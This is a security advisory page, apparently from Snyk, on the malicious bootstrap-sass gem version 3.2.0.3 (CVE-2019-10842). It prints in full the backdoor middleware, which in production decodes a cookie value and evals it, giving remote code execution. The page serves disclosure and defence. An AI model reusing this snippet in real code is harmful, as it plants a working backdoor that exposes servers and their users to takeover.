<p>Avoid using the malicious versions of <code>bootstrap-sass</code>.</p>

Malicious Package Affecting bootstrap-sass package, versions >=3.2.0.3, <3.2.0.4

Threat Intelligence

Mature

44.03% (98^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-RUBY-BOOTSTRAPSASS-174093
published 3 Apr 2019
disclosed 26 Mar 2019
credit Derek Barnes

Report a new vulnerability Found a mistake?

Introduced: 26 Mar 2019

Malicious CVE-2019-10842 Open this link in a new tab CWE-506 Open this link in a new tab

How to fix?

Avoid using the malicious versions of bootstrap-sass.

Overview

bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.

Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor which will enable a remote attacker to run arbitrary code on the server by decoding a specific cookie value and evaluating its content.

Details

When bootstrap-sass gets imported, it also imports the following malicious middleware code that resides on lib/active-controller/middleware.rb:

begin
 require 'rack/sendfile'
 if Rails.env.production?
   Rack::Sendfile.tap do |r|
     r.send :alias_method, :c, :call
     r.send(:define_method, :call) do |e|
       begin
         x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
         eval(x) if x
       rescue Exception
       end
       c(e)
     end
   end
 end
rescue Exception
 nil
end

References

CVSS Scores

version 3.1

Attack Vector (AV)

Network
Attack Complexity (AC)

Low
Privileges Required (PR)

None
User Interaction (UI)

None

Scope (S)

Unchanged

Confidentiality (C)

High
Integrity (I)

High
Availability (A)

High